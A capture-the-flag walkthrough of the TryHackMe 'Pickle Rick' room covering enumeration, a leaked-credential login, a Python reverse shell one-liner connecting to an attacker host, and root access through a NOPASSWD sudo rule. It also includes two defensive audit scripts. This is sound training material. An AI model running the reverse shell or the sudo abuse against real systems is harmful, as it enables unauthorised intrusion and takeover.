TryHackMe: Pickle Rick

Pickle Rick was a great room to get started in applying my skills; it felt good yet easy but very fun. I did overcomplicate it a little bit but ended up learning more and more. Overall it was great and I recommend it if you are starting out.

Room https://tryhackme.com/r/room/picklerick

Initial Enumeration

Nmap Scan

I start by scanning the machine IP with nmap:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T5 -sV -sS -Pn -p- 10.10.174.119
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-06 22:29 WET
Nmap scan report for 10.10.174.119
Host is up (0.059s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.85 seconds

General use of nmap would be nmap -T4 -n -sC -sV -Pn -p- [MACHINE_IP] or nmap -T4 -p- -A [MACHINE_IP]; I just took a different approach based on room requirements and to test and learn different scans.

Web 80

The scan didn’t give me anything that catches the eye, so I proceed to the web page:

Website Page

No visible buttons nor links so the only valid option would be to check the page source:

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Rick is sup4r cool</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="assets/bootstrap.min.css">
  <script src="assets/jquery.min.js"></script>
  <script src="assets/bootstrap.min.js"></script>
  <style>
  .jumbotron {
    background-image: url("assets/rickandmorty.jpeg");
    background-size: cover;
    height: 340px;
  }
  </style>
</head>
<body>

  <div class="container">
    <div class="jumbotron"></div>
    <h1>Help Morty!</h1></br>
    <p>Listen Morty... I need your help, I've turned myself into a pickle again and this time I can't change back!</p></br>
    <p>I need you to <b>*BURRRP*</b>....Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is,
    I have no idea what the <b>*BURRRRRRRRP*</b>, password was! Help Morty, Help!</p></br>
  </div>

  <!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

</body>
</html>
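
A pre-deployment check for the kind of leftover comment shown in the page source above, as an added example that is not part of the original write-up: it walks the HTML with Python's html.parser and reports comment lines that look like credential notes. The keyword list and the trimmed SAMPLE_PAGE are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Assumed keyword list: fields that should never ship inside an HTML comment.
SENSITIVE = re.compile(
    r"\b(user(?:name)?|login|pass(?:word|wd)?|secret|token|api[_-]?key)\b\s*[:=]\s*(\S+)",
    re.IGNORECASE,
)

class CommentAuditor(HTMLParser):
    """Collects comment lines of the form '<sensitive field>: <value>'."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_comment(self, data):
        start_line, _ = self.getpos()  # line of the opening '<!--'
        for offset, line in enumerate(data.splitlines()):
            match = SENSITIVE.search(line)
            if match:
                self.findings.append({
                    "line": start_line + offset,
                    "field": match.group(1).lower(),
                    "value": match.group(2),
                })

def audit_html(text):
    """Return findings for comments only; visible page text is ignored."""
    auditor = CommentAuditor()
    auditor.feed(text)
    auditor.close()
    return auditor.findings

# Constructed sample: a trimmed copy of the page source from the write-up.
SAMPLE_PAGE = """<!DOCTYPE html>
<html lang="en">
<body>
  <div class="container">
    <h1>Help Morty!</h1>
  </div>

  <!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

</body>
</html>
"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_PAGE):
        print("line {line}: {field} = {value}".format(**finding))
```

Run against built templates in CI, a non-empty result is a reason to fail the build before the page is published.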

Gobuster Scan

I find a username that I’m going to use to log into Rick’s computer, but first I need to find where. I checked SSH at first but had no success, and then went on to use gobuster:

┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ".html,.txt,.php" -t 25 --timeout 20s -u http://10.10.174.119:80
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.174.119:80
[+] Method:                  GET
[+] Threads:                 25
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php
[+] Timeout:                 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 1062]
/login.php            (Status: 200) [Size: 882]
/assets               (Status: 301) [Size: 315] [--> http://10.10.174.119/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/robots.txt           (Status: 200) [Size: 17]
/denied.php           (Status: 302) [Size: 0] [--> /login.php]
/server-status        (Status: 403) [Size: 278]
/clue.txt             (Status: 200) [Size: 54]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

Gobuster gave me 3 new directories: login.php, robots.txt and clue.txt (the ones that returned 200, meaning they are ok for me to look at). I start by looking up the text files only to find a random word and a clue that doesn’t give me much right now:

robots.txt

clue.txt

After that I went to login.php and found a login form, the place where I’m meant to log into Rick’s computer:

Login Page

Based on what I found so far, I decided to try logging in with the robots.txt as the password, and luckily enough we are in:

Portal Page

Reverse Shell

Inside the portal.php the only page I can access is the command panel, where I can execute commands such as ls, whoami, etc. Since there’s a shell, I decided to try and reverse it so I could have better control over it, and the first step of doing it is starting a listener:

nc -lvnp 4444

After that I tried using bash first but had no success, and then used python and it worked:

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("[REDACTED]",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [REDACTED] from (UNKNOWN) [10.10.174.119] 47380
www-data@ip-10-10-174-119:/var/www/html$ 

Now that I have better control, I started by doing a simple ls:

www-data@ip-10-10-174-119:/var/www/html$ ls
Sup3rS3cretPickl3Ingred.txt  
clue.txt    
find        
login.php   
robots.txt
assets                       
denied.php  
index.html  
portal.php

Obtaining the Ingredients

Ingredient #1

I got a similar result to the gobuster enumeration but one particular file stands out from the others, Sup3rS3cretPickl3Ingred.txt, and reading the file gives us the first ingredient:

www-data@ip-10-10-174-119:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
[REDACTED]

Ingredient #2

Next up I look inside the home directory and find Rick’s home folder with a text file inside called ‘second ingredients’, which when read gave me the second ingredient:

www-data@ip-10-10-174-119:/home/rick$ cat 'second ingredients'
[REDACTED]

For the last ingredient I went to look inside the root file since it’s the most common place that came to mind for me. At first doing ls root didn’t work because of permissions, so I decided to do sudo -l to check where I could use sudo:

www-data@ip-10-10-174-119:/$ sudo -l
Matching Defaults entries for www-data on ip-10-10-174-119:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-174-119:
    (ALL) NOPASSWD: ALL

And luckily for me I do have sudo permissions for every command, so a simple sudo ls root will work just fine. With that I find a text file called 3rd.txt inside /root/:

www-data@ip-10-10-174-119:/$ sudo ls root
3rd.txt  snap
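
An audit for the sudo grant shown in the sudo -l output above, as an added example that is not part of the original write-up: it parses sudo -l text and flags rules that give a service account passwordless, unrestricted root. The SERVICE_ACCOUNTS list, the severity labels and SCOPED_OUTPUT (host web01, the systemctl command) are assumptions constructed for contrast.

```python
import re

# Assumption: accounts that run network-facing daemons on this host.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

USER_RE = re.compile(r"^User (\S+) may run the following commands on (\S+):$")
# "(runas) [TAG: ...] command[, command]" as printed by `sudo -l`
ENTRY_RE = re.compile(r"^\s+\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

def parse_sudo_l(output):
    """Turn `sudo -l` text into a list of rule dicts; Defaults lines are skipped."""
    rules, user = [], None
    for line in output.splitlines():
        header = USER_RE.match(line.strip())
        if header:
            user = header.group(1)
            continue
        entry = ENTRY_RE.match(line)
        if entry and user:
            rules.append({
                "user": user,
                "runas": [u.strip() for u in entry.group(1).split(":")[0].split(",")],
                "tags": [t.strip() for t in entry.group(2).split(":") if t.strip()],
                "commands": [c.strip() for c in entry.group(3).split(",")],
            })
    return rules

def audit(rules, service_accounts=SERVICE_ACCOUNTS):
    """Report rules that allow any command as root, with the aggravating factors."""
    findings = []
    for rule in rules:
        if "ALL" not in rule["commands"] or not {"ALL", "root"} & set(rule["runas"]):
            continue
        reasons = ["any command as root"]
        if "NOPASSWD" in rule["tags"]:
            reasons.append("no password prompt")
        if rule["user"] in service_accounts:
            reasons.append("service account")
        severity = "critical" if len(reasons) == 3 else "review"
        findings.append((rule["user"], severity, reasons))
    return findings

# Output as shown in the write-up (Defaults trimmed to one line).
ROOM_OUTPUT = """Matching Defaults entries for www-data on ip-10-10-174-119:
    env_reset, mail_badpass
User www-data may run the following commands on ip-10-10-174-119:
    (ALL) NOPASSWD: ALL
"""
# Constructed contrast: the same account limited to one scoped command.
SCOPED_OUTPUT = """User www-data may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/systemctl reload apache2
"""

if __name__ == "__main__":
    print(audit(parse_sudo_l(ROOM_OUTPUT)))
    print(audit(parse_sudo_l(SCOPED_OUTPUT)))
```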

Ingredient #3

So, finally, to get the third and last ingredient I just gotta run sudo cat /root/3rd.txt:

www-data@ip-10-10-174-119:/$ sudo cat /root/3rd.txt
3rd ingredients: [REDACTED]

This post is licensed under CC BY 4.0 by the author.